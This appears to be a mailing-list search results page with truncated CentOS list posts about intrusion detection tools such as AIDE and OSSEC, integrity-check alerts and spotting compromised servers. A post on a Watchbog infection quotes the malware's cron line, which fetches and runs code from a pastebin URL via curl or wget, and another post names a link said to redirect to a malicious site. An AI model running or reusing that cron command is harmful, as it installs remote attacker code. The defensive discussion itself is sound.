Displaying 20 results from an estimated 10000 matches similar to: "AIDE or OSSEC on CentOS 5.4 x86_64?"
2010 Mar 04
8
Intrusion Detection
Hello all,
I have been exploring the various intrusion detection systems available for the Linux platform and was wondering which ones you all would recommend? I have used AIDE before and while it is extremely easy to set up, it does not support the ability to send alerts as files are changed (which allows one to be aware of an intrusion almost immediately).
Thank you,
Dan Burkland
2017 Nov 06
1
How to detect botnet user on the server ?
Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than
2018 Dec 15
7
CentOS 7.5 Linux box got infected with Watchbog malware
Hi,
Is there a way to find out how the CentOS 7.5 Linux box got infected with
malware?
Currently I am referring to
http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
to carry out the steps below, which are done manually.
1)rm -fr /tmp/*timesyncc.service*
2)crontab -e -u apigee
delete the cron entry
*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget
2017 Nov 06
2
How to detect botnet user on the server ?
Hello guys,
What is the best way to identify a possible user using a botnet with PHP
on the server? And if he is using GET commands, for example, on another server.
Does Apache log outbound connections?
If it is using a file that is not malicious the clam av would not identify.
Thanks
2012 May 25
4
PCI/DSS compliance on CentOS
I have a client project to implement PCI/DSS compliance.
The PCI/DSS auditor has stipulated that the web server, application
middleware (tomcat), the db server have to be on different systems.
In addition the auditor has also stipulated that there be an NTP
server, a "patch" server,
The Host OS on all of the above nodes will be CentOS 6.2.
Below is a list of things that would be
2012 Sep 28
1
Changes to inodes discovered by aide
Hi.
On one of my servers aide just reported inode changes to a large bunch of files in a variety of directories, e.g. /usr/bin, /usr/sbin etc. This machine sits behind a couple of firewalls and it would be hard to get to.
The day before I updated "clam*" and updated the aide database right after that:
-rw------- 1 root root 7407412 Sep 26 10:58 aide.db.gz
The problem was that the
2008 Dec 28
1
aide and changes in system
I've checked my system by aide and i've received information:
changed: /bin
changed: /bin/tar
changed: /bin/mv
changed: /bin/cp
changed: /bin/ls
changed: /bin/vi
I don't remember changing those commands; what does it mean? Has somebody broken in? Or are those commands changed normally?
2014 Sep 09
1
C6 : AIDE experience
Having problems with Tripwire on C6, I installed AIDE from the base
repository. x86_64 0.14-3.el6_2.2 base 123 k
typing:
aide
result:
"Couldn't open file /var/lib/aide/aide.db.gz for reading"
(directory is empty and aide.db.gz does not exist.)
typing:
aide -i (to initialise the Aide database)
result:
"AIDE, version 0.14
### AIDE database at
2012 Aug 22
2
Hiera, OSSEC and per-node stuff?
Hi.
I have an interesting use case.
OSSEC is a security tool based on a server-client architecture. The server
generates keys for agents, and every agent has different key.
Now I want to distribute these keys via puppet. I've come across hiera
and installed it, and it works superbly, but how to store per-node key
in hiera?
This is my idea:
hiera.yaml:
---
:hierarchy:
-
2019 Nov 14
4
how to know when a system is compromised
How do you know when a Linux system has been compromised?
Every day I watch our systems with all the typical tools, ps, top, who,
I watch firewall / IPS logs, I have logwatch setup and mailing daily
summaries to me and I dive deeper into logs if something looks suspicious.
What am I missing or not looking at that you security gurus are looking at?
I subscribe to the centos and SANS
2016 Feb 02
2
Wiki Update - Aide Link
Hello All,
My username is MikeThompson
The link to configure Aide at the bottom of this page:
https://wiki.centos.org/HowTos/OS_Protection
is dead, and says it's dead; however, the old link to
http://www.bofh-hunter.com/2008/04/10/centos-5-and-aide/ now redirects
to a malicious website.
One of my less than savvy users got his Windows machine infected there
last night. I'm wondering if it
2008 Apr 09
1
aide questions, please
I'm trying out aide since tripwire doesn't seem to be in the 5. releases
anymore. I do not have SELinux on the server (not at installation), and I
just yum installed the aide rpms, so I should have the latest.
When I run my aide --init, I get all of these lines for all the files:
lgetfilecon_raw failed for /usr/share/X11/app-defaults/XLogo:No data
available
I then copy the
2005 Jun 16
3
turning off prelinking?
In short, the reason for considering (and still only considering) turning it off is
to make tripwire usable again (security vs. performance, I guess).
Is it possible to completely turn it off system-wide? Any additional steps
needed on the existing system (that already have half of the binaries
prelinked)?
What order of performance degradation to expect? If it is minor, nobody is
going to cry
2007 Sep 26
4
Intrusion Detection Systems
Situation: We are providing hosting services.
I've grown tired of the various kiddie scripts/dictionary attacks on
various services. The latest has been against vsftpd, on systems that I
can't easily control vs. putting strict limits on ssh. We simply have
too many users entering from too many networks many with dynamic IP
addresses.
Enter.... thinking about LIDS or Log Based
2010 Apr 29
1
Aide error "Caught SIGBUS/SEGV"
One of my servers has recently started giving an error every time I run
"aide --check". I ran it manually twice today with the same results.
The second time, I added the -V flag, but that didn't give me anything
useful. The system is currently running CentOS 5.3.
Nothing on the system has changed recently (that I am aware of). The
Aide database hasn't been updated in a few
2015 Jan 13
1
SELinux-alert: aide wants to write to /var/run/winbindd/pipe
Hi,
does anyone know if aide should have access to this socket?
SELinux is preventing /usr/sbin/aide from write access on the sock_file /var/run/winbindd/pipe.
Thanks
Patrick
(on CentOS6 if that matters)
2009 Oct 27
0
Warning message when running aide after upgrading to 5.4
I upgraded my box from 5.3 to 5.4. When running "aide --update", I'm getting this warning message in /var/log/messages: "aide: Libgcrypt warning: missing initialization - please fix the application"
Below is the aide version installed:
aide -v
Aide 0.13.1
Compiled with the following options:
WITH_MMAP
WITH_POSIX_ACL
WITH_SELINUX
WITH_XATTR
WITH_LSTAT64
WITH_READDIR64
2006 Mar 29
2
AIDE Reports changed:/boot/grub/stage2
My daily AIDE report suggests Grub's stage2 file has changed. Could I
trouble you for your opinion about how concerned I should be and what to
do if your concern is moderate or higher?
File: /boot/grub/stage2
MD5 : Mlkt9ZVo59SSjvodt+956Q== ,
yIQIMP6TUHG5BegtoOk0ug==
SHA1 : ZxehaXSXcnH/WlcInHpFnyT1vcg= ,
dReBGlO3DIAB+mjsxUWioB8NlbE=
2010 Aug 16
4
Need tip on an inexpensive printer for college student using CentOS 5.5
Sending my son back to college with a dual-boot laptop with Win 7 and
CentOS 5.5. He uses Win7 to manage his iPod and SW that is sometimes
issued by a professor for a specific course... otherwise he uses CentOS
for everything else. That setup worked well last year, except for
printing. He has a low-end Canon printer that is not supported in the
Linux realm.
Most of his coursework was uploaded to
2011 Feb 02
1
The AIDE section of the Hardening CentOS wiki page
I have recently received an e-mail message regarding the above wiki
page. I reproduce it, below, less the header.
As I was the last to edit that page, I am mentioned in the details at
its foot and that is from where the message author's error originates
-- as I'm not the original creator of the page.
The broken link is to a section of the blog of Jim "Evolution" Perrin.
Are you